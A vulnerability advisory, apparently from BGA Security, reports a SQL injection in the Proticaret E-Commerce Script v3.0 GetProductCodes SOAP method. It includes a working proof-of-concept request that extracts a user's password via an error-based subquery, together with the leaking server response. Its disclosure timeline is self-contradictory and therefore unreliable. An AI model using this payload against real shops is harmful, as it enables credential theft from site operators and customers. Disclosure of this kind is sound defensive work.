Proticaret E-Commerce Script 3.0 SQL Injection

`Document Title:  
============  
Proticaret E-Commerce Script v3.0 >= SQL Injection  
  
Release Date:  
===========  
13 Nov 2014  
  
Product & Service Introduction:  
========================  
Proticaret is a free e-commerce script.  
  
Abstract Advisory Information:  
=======================  
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0  
  
Vulnerability Disclosure Timeline:  
=========================  
20 Oct 2014 : Contact with Vendor  
20 Nov 2014 : Vendor Response  
June 26, 2014 : Patch Released  
13 Nov 2014 : Public Disclosure  
  
Discovery Status:  
=============  
Published  
  
Affected Product(s):  
===============  
Promist Bilgi Ýletiþim Teknolojileri A.Þ  
Product: Proticaret E-commerce Script v3.0 >=  
  
Exploitation Technique:  
==================  
Remote, Unauthenticated  
  
  
Severity Level:  
===========  
Critical  
  
Technical Details & Description:  
========================  
SQL Injection  
  
Proof of Concept (PoC):  
==================  
Proof of Concept  
  
Request:  
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">  
<soapenv:Header/>  
<soapenv:Body>  
<tem:GetProductCodes>  
<!--Optional:-->  
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>  
<!--Optional:-->  
<tem:StartWith>?</tem:StartWith>  
</tem:GetProductCodes>  
</soapenv:Body>  
</soapenv:Envelope>  
  
Response:  
  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">  
<soap:Body>  
<soap:Fault>  
<faultcode>soap:Server</faultcode>  
  
<faultstring>System.Web.Services.Protocols.SoapException: Server   
was unable to process request. --->   
System.Data.SqlClient.SqlException: Conversion failed when converting   
the nvarchar value 'secretpassword' to data type int.  
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)  
  
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException   
exception, Boolean breakConnection, Action`1 wrapCloseInAction)  
at  
  
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject  
stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)  
at  
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,   
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet  
bulkCopyHandler, TdsParserStateObject stateObj, Boolean&   
dataReady)  
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)  
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)  
at System.Data.SqlClient.SqlDataReader.Read()  
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)  
--- End of inner exception stack trace ---</faultstring>  
<detail/>  
</soap:Fault>  
</soap:Body>  
</soap:Envelope>  
  
  
Solution Fix & Patch:  
================  
Apply the patch for v3.0  
  
Security Risk:  
==========  
The risk of the vulnerabilities above estimated as critical.  
  
Credits & Authors:  
==============  
Bilgi Güvenliði Akademisi  
  
Disclaimer & Information:  
===================  
The  
information provided in this advisory is provided as it is without any   
warranty. BGA disclaims all warranties, either expressed or implied,   
including the warranties of merchantability and capability for a   
particular purpose. BGA or its suppliers are not liable in any case of   
damage, including direct, indirect, incidental, consequential loss of   
business profits or special damages.  
  
Domain: www.bga.com.tr  
Social: twitter.com/bgasecurity  
Contact: [email protected]  
  
Copyright © 2014 | BGA   
  
  
`